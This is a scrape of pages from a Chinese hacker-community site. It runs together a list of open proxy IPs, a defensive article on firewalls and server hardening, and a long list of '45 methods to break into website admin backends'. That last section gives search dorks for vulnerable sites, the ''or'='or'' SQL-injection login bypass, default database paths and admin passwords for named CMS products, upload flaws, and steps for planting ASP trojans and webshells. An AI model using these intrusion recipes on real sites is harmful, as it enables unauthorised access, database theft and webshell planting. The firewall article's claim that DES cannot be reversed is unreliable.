最新代理服务器 - 中国蓝客联盟
最新代理服务器
代理服务器IP
1111.1.60.16380透明代理浙江省杭州市 移动
2206.174.165.1613128透明代理美国
359.46.72.2458080透明代理辽宁省沈阳市 电信
4183.203.22.18480透明代理山西省 移动
5183.224.1.3080高度匿名云南省昆明市 移动
6111.161.126.10180透明代理天津市 联通
7177.124.168.108080透明代理巴西
8187.18.125.2513128透明代理巴西
9211.152.50.7080高度匿名上海市 北京世纪互联宽带数据中心电信节点
1089.46.233.1008081透明代理罗马尼亚
11120.202.249.23080高度匿名湖北省 移动
12111.161.126.10080透明代理天津市 联通
13198.50.149.1898888透明代理加拿大
14189.59.9.2188080透明代理巴西
15111.13.2.13980透明代理北京市 移动
16101.251.238.1238080透明代理北京市海淀区
17117.177.243.3580高度匿名四川省内江市 移动
18111.13.2.13880透明代理北京市 移动
19182.92.157.1033128透明代理浙江省杭州市 阿里巴巴网络有限公司
20111.13.2.13080透明代理北京市 移动
21117.177.243.2180高度匿名四川省内江市 移动
22202.133.104.10680透明代理马来西亚
23223.68.6.108000透明代理江苏省宿迁市 移动
24202.106.16.363128透明代理北京市 联通ADSL
25222.85.1.1238118透明代理河南省许昌市襄城县 电信
2641.72.105.383128透明代理赞比亚
27111.161.126.9980透明代理天津市 联通
2894.23.205.323128透明代理法国
29122.225.106.3580透明代理浙江省湖州市 电信
30119.4.115.518090透明代理四川省成都市 联通
31218.59.144.12080高度匿名山东省济宁市
3231.15.48.1280透明代理瑞典
3337.131.208.1418080透明代理俄罗斯
3458.67.159.5080透明代理广东省广州市 新一代IDC机房
3582.208.99.713128透明代理俄罗斯
36115.236.59.1943128匿名代理浙江省杭州市
37124.192.148.13380透明代理北京市 电信通
38188.165.85.1153128透明代理法国
39119.6.144.74843匿名代理四川省达州市 联通
40118.244.213.63128透明代理北京市 电信通酒仙桥数据中心
41111.13.12.20280透明代理北京市 北京百度网讯科技有限公司移动节点
42219.93.183.1068080高度匿名马来西亚
43119.6.144.73843匿名代理四川省达州市 联通
44202.106.169.2288080高度匿名北京市 联通ADSL
45178.62.80.1883128透明代理俄罗斯
46113.107.57.7680透明代理广东省揭阳市
47198.251.67.1948080透明代理美国
48201.55.143.13128透明代理巴西
49180.76.146.123128透明代理北京市 北京百度网讯科技有限公司BGP节点
50183.57.78.618085透明代理广东省广州市 电信如何防范黑客 - 中国蓝客联盟
如何防范黑客
黑客对服务器进行扫描是轻而易举的，一旦找到了服务器存在的问题，那么后果将是严重的。这就是说作为网络管理员应该采取不要的手段防止黑客对服务器进行扫描，本节我将谈谈如何才能让自己的服务器免遭黑客扫描。
一、防范黑客心得体会：
1、屏蔽可以IP地址：
这种方式见效最快，一旦网络管理员发现了可疑的IP地址申请，可以通过防火墙屏蔽相对应的IP地址，这样黑客就无法在连接到服务器上了。但是这种方法有很多缺点，例如很多黑客都使用的动态IP，也就是说他们的IP地址会变化，一个地址被屏蔽，只要更换其他IP仍然可以进攻服务器，而且高级黑客有可能会伪造IP地址，屏蔽的也许是正常用户的地址。
2、过滤信息包：
通过编写防火墙规则，可以让系统知道什么样的信息包可以进入、什么样的应该放弃，如此一来，当黑客发送有攻击性信息包的时候，在经过防火墙时，信息就会被丢弃掉，从而防止了黑客的进攻。但是这种做法仍然有它不足的地方，例如黑客可以改变攻击性代码的形态，让防火墙分辨不出信息包的真假；或者黑客干脆无休止的、大量的发送信息包，知道服务器不堪重负而造成系统崩溃。
3、修改系统协议：
对于漏洞扫描，系统管理员可以修改服务器的相应协议，例如漏洞扫描是根据对文件的申请返回值对文件存在进行判断的，这个数值如果是200则表示文件存在于服务器上，如果是404则表明服务器没有找到相应的文件，但是管理员如果修改了返回数值、或者屏蔽404数值，那么漏洞扫描器就毫无用处了。
4、经常升级系统版本：
任何一个版本的系统发布之后，在短时间内都不会受到攻击，一旦其中的问题暴露出来，黑客就会蜂拥而致。因此管理员在维护系统的时候，可以经常浏览著名的安全站点，找到系统的新版本或者补丁程序进行安装，这样就可以保证系统中的漏洞在没有被黑客发现之前，就已经修补上了，从而保证了服务器的安全。
5、及时备份重要数据：
亡羊补牢，如果数据备份及时，即便系统遭到黑客进攻，也可以在短时间内修复，挽回不必要的经济损失。想国外很多商务网站，都会在每天晚上对系统数据进行备份，在第二天清晨，无论系统是否收到攻击，都会重新恢复数据，保证每天系统中的数据库都不会出现损坏。数据的备份最好放在其他电脑或者驱动器上，这样黑客进入服务器之后，破坏的数据只是一部分，因为无法找到数据的备份，对于服务器的损失也不会太严重。
然而一旦受到黑客攻击，管理员不要只设法恢复损坏的数据，还要及时分析黑客的来源和攻击方法，尽快修补被黑客利用的漏洞，然后检查系统中是否被黑客安装了木马、蠕虫或者被黑客开放了某些管理员账号，尽量将黑客留下的各种蛛丝马迹和后门分析清除、清除干净，防止黑客的下一次攻击。
6、使用加密机制传输数据：
对于个人信用卡、密码等重要数据，在客户端与服务器之间的传送，应该仙经过加密处理在进行发送，这样做的目的是防止黑客监听、截获。对于现在网络上流行的各种加密机制，都已经出现了不同的破解方法，因此在加密的选择上应该寻找破解困难的，例如DES加密方法，这是一套没有逆向破解的加密算法，因此黑客的到了这种加密处理后的文件时，只能采取暴力破解法。个人用户只要选择了一个优秀的密码，那么黑客的破解工作将会在无休止的尝试后终止。
二、防火墙使用说明：
1．什么是防火墙？
防火墙的英文叫做firewall，它能够在网络与电脑之间建立一道监控屏障，保护在防火墙内部的系统不受网络黑客的攻击。逻辑上讲，防火墙既是信息分离器、限制器，也是信息分析器，它可以有效地对局域网和Internet之间的任何活动进行监控，从而保证局域网内部的安全。
网络上最著名的软件防火墙是LockDown2000，这套软件需要经过注册才能获得完整版本，它的功能强大，小到保护个人上网用户、大到维护商务网站的运作，它都能出色的做出惊人的表现。但因为软件的注册需要一定费用，所以对个人用户来说还是选择一款免费的防火墙更现实。天网防火墙在这里就更加适合个人用户的需要了，天网防火墙个人版是一套给个人电脑使用的网络安全程序，它能够抵挡网络入侵和攻击，防止信息泄露。
2、天网防火墙的基本功能：
天网防火墙个人版把网络分为本地网和互联网，可以针对来自不同网络的信息，来设置不同的安全方案，以下所述的问题都是针对互联网而言的，故所有的设置都是在互联网安全级别中完成的。 怎样防止信息泄露？ 如果把文件共享向互联网开放，而且又不设定密码，那么别人就可以轻松的通过互联网看到您机器中的文件，如果您还允许共享可写，那别人甚至可以删除文件。 你可以在个人防火墙的互联网安全级别设置中，将NETBIOS 关闭，这样别人就不能通过INTERNET访问你的共享资源了（这种设置不会影响你在局域网中的资源共享）。
当拨号用户上网获得了分配到的IP地址之后，可以通过天网防火墙将ICMP关闭，这样黑客用PING的方法就无法确定使用者的的系统是否处于上网状态，无法直接通过IP地址获得使用者系统的信息了。
需要指出的是：防火墙拦截的信息并不完全是攻击信息，它记录的只是系统在安全设置中所拒绝接收的数据包。在某些情况下，系统可能会收到一些正常但又被拦截的数据包，例如某些路由器会定时发出一些IGMP包等；或有些主机会定时PING出数据到本地系统确认连接仍在维持着，这个时候如果利用防火墙将ICMP和IGMP屏蔽了，就会在安全记录中见到这些被拦截的数据包，因此这些拦截下来的数据包并不一定是黑客对系统进行攻击造成的。
3、使用防火墙的益处：
使用防火墙可以保护脆弱的服务，通过过滤不安全的服务，Firewall可以极大地提高网络安全和减少子网中主机的风险。例如，Firewall可以禁止NIS、NFS服务通过，同时可以拒绝源路由和ICMP重定向封包。
另外防火墙可以控制对系统的访问权限，例如某些企业允许从外部访问企业内部的某些系统，而禁止访问另外的系统，通过防火墙对这些允许共享的系统进行设置，还可以设定内部的系统只访问外部特定的Mail Server和Web Server，保护企业内部信息的安全。
4、防火墙的种类：
防火墙总体上分为包过滤、应用级网关和代理服务器等三种类型：
（1）数据包过滤
数据包过滤(Packet Filtering)技术是在网络层对数据包进行选择，选择的依据是系统内设置的过滤逻辑，被称为访问控制表(Access Control Table)。通过检查数据流中每个数据包的源地址、目的地址、所用的端口号、协议状态等因素，或它们的组合来确定是否允许该数据包通过。 数据包过滤防火墙逻辑简单，价格便宜，易于安装和使用，网络性能和透明性好，它通常安装在路由器上。路由器是内部网络与Internet连接必不可少的设备，因此在原有网络上增加这样的防火墙几乎不需要任何额外的费用。
数据包过滤防火墙的缺点有二：一是非法访问一旦突破防火墙，即可对主机上的软件和配置漏洞进行攻击；二是数据包的源地址、目的地址以及IP的端口号都在数据包的头部，很有可能被窃听或假冒。
（2）应用级网关
应用级网关(Application Level Gateways)是在网络应用层上建立协议过滤和转发功能。它针对特定的网络应用服务协议使用指定的数据过滤逻辑，并在过滤的同时，对数据包进行必要的分析、登记和统计，形成报告。实际中的应用网关通常安装在专用工作站系统上。
数据包过滤和应用网关防火墙有一个共同的特点，就是它们仅仅依靠特定的逻辑判定是否允许数据包通过。一旦满足逻辑，则防火墙内外的计算机系统建立直接联系，防火墙外部的用户便有可能直接了解防火墙内部的网络结构和运行状态，这有利于实施非法访问和攻击。
（3）代理服务
代理服务(Proxy Service)也称链路级网关或TCP通道(Circuit Level Gateways or TCP Tunnels)，也有人将它归于应用级网关一类。它是针对数据包过滤和应用网关技术存在的缺点而引入的防火墙技术，其特点是将所有跨越防火墙的网络通信链路分为两段。防火墙内外计算机系统间应用层的" 链接"，由两个终止代理服务器上的" 链接"来实现，外部计算机的网络链路只能到达代理服务器，从而起到了隔离防火墙内外计算机系统的作用。此外，代理服务也对过往的数据包进行分析、注册登记，形成报告，同时当发现被攻击迹象时会向网络管理员发出警报，并保留攻击痕迹。58cv网址导航中国蓝客联盟 (LUC) 十周年45种攻入后台的方法 - 中国蓝客联盟
45种攻入后台的方法
45种攻入后台的方法（非原创，来自伟大的网络）
1、到Google搜索， inurl:asp
2、到Google，搜索一些关键字，edit.asp? 韩国肉鸡为多，多数为MSSQL数据库!
3、利用挖掘鸡和一个ASP木马：
文件名是login.asp
路径组是/manage/
关键词是went.asp
用’or’='or’来登陆
4、以下这个方法因为太多人做过，所以一些网站管理员对此都有防范之心了，成功率不高:
关键字：“Co Net MIB Ver 1.0网站后台管理系统”
帐号密码为 ‘or’='or’
5、动感购物系统，呵呵。想到了明小子：
inurl:help.asp登陆，如未注册成为会员!
upLoad_bm1.asp和upLoad_c1.asp这两个随便选个，一般管理员都忽视了这2漏洞。
6、默认数据库地址blogdata/acblog.asa
关键字：acblog
7、百度 /htdocs
注册里可以直接上传asa文件！
8、/Database/#newasp.mdb
关键词：NewAsp SiteManageSystem Version
9、用挖掘机
关键字：Powered by WEBBOY
页面：/upfile.asp
10、baidu中搜索关键字Ver5.0 Build 0519
(存在上传漏洞)
11、Upfile_Article.asp bbs/upfile.asp
输入关键字：powered by mypower ，
应该是动什么上传漏洞来着？用的人也比较多
估计明小子，挖掘鸡就可以了
12、inurl:winnt\system32\inetsrv\
在google里面输入这个就可以找到很多网站
13、现在GOOGLE搜索关键字 intitle:网站小助手　inurl:asp
14、关键字： 首页 最新动态 新手指南 舞曲音乐 下载中心 经典文章 玩家风采 装备购买站内流言友情连接 本站论坛
挖掘鸡的关键字 添 setup.asp
15、VBulletin论坛的数据库
默认数据库地址!
/includes/functions.php
1)网站猎手。下载地址：百度 Google!
Powered by: vBulletin Version 3.0.1
Powered by: vBulletin Version 3.0.2
Powered by: vBulletin Version 3.0.3
其中一个就可以了
1)打开百度或GOOGLE搜索，输入powered by comersus ASP shopping cart
open source。
这是一个商场系统。
2)网站的最底部分，有个 Comersus Open Technologies LC。打开看下~~comersus系统~
猜到，comersus.mdb. 是数据库名
数据库都是放在database/ 后的，
所以database/comersus.mdb
comersus_listCategoriesTree.asp换成database/comersus.mdb，不能下载。
那样把前一个’’store/”除去，再加上database/comersus.mdb 试试
都是默认数据库地址
17、无忧传奇官方站点程序。
1)后台管理地址：http://您的域名/msmiradmin/
或者是 http://您的域名/admin.asp
2)默认后台管理帐号：msmir
3)默认后台管理密码：msmirmsmir 或 msmir
数据库文件为 http://您的域名/msmirdata/msmirArticle.mdb
或者是 http://您的域名/msmirdata/msmirArticle.asa
数据库连接文件为 ***********/Conn.asp
也是默认数据库地址。 现在传奇4F好多都是这个。呵呵我刚还没事搞了个呢`
18、百度里输入/skins/default/
19、利用挖掘机
关键机:power by Discuz
路径:/wish.php
Discuz!论坛 wish.php远程包含漏洞
20、上传漏洞.
工具 : 当然还是明小子了
网站猎手 或者挖掘鸡了。
关键字powered by mypower
检测的页面或文件插入upfile_photo.asp
这个用的人也N多。。
21、新云漏洞
这个漏洞ACCESS和SQL版通吃。
Google搜索关键字 “关于本站 – 网站帮助 – 广告合作 – 下载声明 – 友情连接 – 网站地图 – 管理登录”
把flash/downfile.asp?url=uploadfile//conn.asp提交到网站根目录。就可以下载conn.asp
以源码，软件等下载站居多。
大家时常碰到数据库如果前面或者中间+了# 可以用#替换就可以下载了
\database\#newasp.mdb
如：#xzws.mdb 改成#xzws.mdb
收集的。没试过。。。 – -！
22、通吃所有商城+动力上传系统
使用工具:挖掘鸡 v1.1 明小子
关键字:选购-&加入购物车-&去收银台-&确认收货人信息-&选付款方式-&选配送方式-&在线支付或下单后汇款-&汇款确认-&发货-&完成
漏洞页面:upload.asp
upfile_flash.asp
还是上传漏洞拿webshell
23、注射漏洞
百度搜索ioj’s blog
admin_articlerecyclebin.asp
inurl:admin_articlerecyclebin.asp
工具:网站猎手
关键词:inurl:Went.asp
后缀:manage/login.asp
口令:’or’='or’
这软件还不是太熟悉。 – -
入侵魔兽私服
需要的工具：ASP木马 – -！废话了。
关键字：All Right Reserved Design:游戏联盟
后台地址：admin/login.asp
数据库的地址：chngame/#chngame.mdb
都默认的。数据库闹下来自己解密吧不多说了。
漏洞是利用管理员iis设置的失误
用baidu 关键字就是比较罕见的脚本名
动网: ReloadForumCache.asp
Leadbbs: makealltopanc.asp
BBSXP: admin_fso.asp
动易: admin_articlerecyclebin.asp
好像比较少吧不太清楚了这个。。
国外站的爆库漏洞
关键字：sad Raven’s Guestbook
密码地址:/passwd.dat
后台地址:/admin.php
Discuz 4.1.0跨站漏洞
利用工具:1)WAP浏览器
&&&&&&&&&&&&&&&&&&2)WAP编码转换器
关键字:”intextiscuz! 4.1.0″
WAP浏览器…………………………!!
关键字：尚奈克斯
后台路径/system/manage.asp
直接传ASP木马
挖掘机去。。 – -！
1:网站猎手
关键字:切勿关闭Cookies功能，否则您将不能登录
插入diy.asp
关键字:Team5 Studio All rights reserved
默认数据库:data/team.mdb
剩下的自己搞。不多说了
工具: 挖掘机 辅臣数据库读取器
关键字: 企业简介 产品展示 产品列表
后缀添加: /database/myszw.mdb
后台地址: admin/Login.asp
都默认的。一样。数据库闹下来自己解密码去 。就行了。。 – -
关键子 XXX inurl:Nclass.asp
在”系统设置”里写个木马。
会被保存到 在 config.asp内。
不进后台照样拿动网WEBSHELL
data.asp?action=BackupData 动网数据库备份默认路径
没试过。。。不知道。
工具:网站猎手 WebShell
关键字:inurl:Went.asp
后缀:manage/login.asp
弱口令:’or’='or’
也没试过。 。。。。。。
关键字owered byCDN_NEWS
随便扫遍文章加一个’ ，来试探注入点
后台地址:admin_index.asp
用啥工具我就不说了吧。。。。。。。。。
入侵雷池新闻发布系统
关键字:leichinews
去掉leichinews后面的.
打上:admin/uploadPic.asp?actionType=mod&picName=xuanran.asp
再上传马…..
进访问uppic anran.asp 登陆马.
没试过。汗 ，收集来的。
工具挖掘机就行了。
关键字ower System Of Article Management Ver 3.0 Build
默认数据库:database\yiuwekdsodksldfslwifds.mdb
后台地址:自己扫描!
工具明小子。- -！怎么又是他啊。
MD5自己解………
(NND这个一扫一大堆。大家可以去试试。。)
一、通过GOOGLE搜索找大量注入点
关键字：asp?id=1 gov.jp/ asp?id=
语言：想入侵哪个国家就填什么语言吧
关键字：Powered by:94KKBBS 2005
利用密码找回功能 找回admin
提问:ddddd 回答:ddddd
关键字:inurl:Went.asp
后台为manage/login.asp
后台密码: ‘or’=’ 或者 ‘or”=”or’ 登录　进入
默认数据库地址atabase/DataShop.mdb
关键字:****** inurl:readnews.asp
把最后一个/改成\ ，直接暴库，看密码，进后台
随便添加个新闻 在标题输入我们的一句话木马
工具:一句话木马
BBsXp 5.0 sp1 管理员猜解器
关键词:powered by bbsxp5.00
进后台，备份一句话马!
关键字：程序核心：BJXSHOP网上开店专家
后台:/admin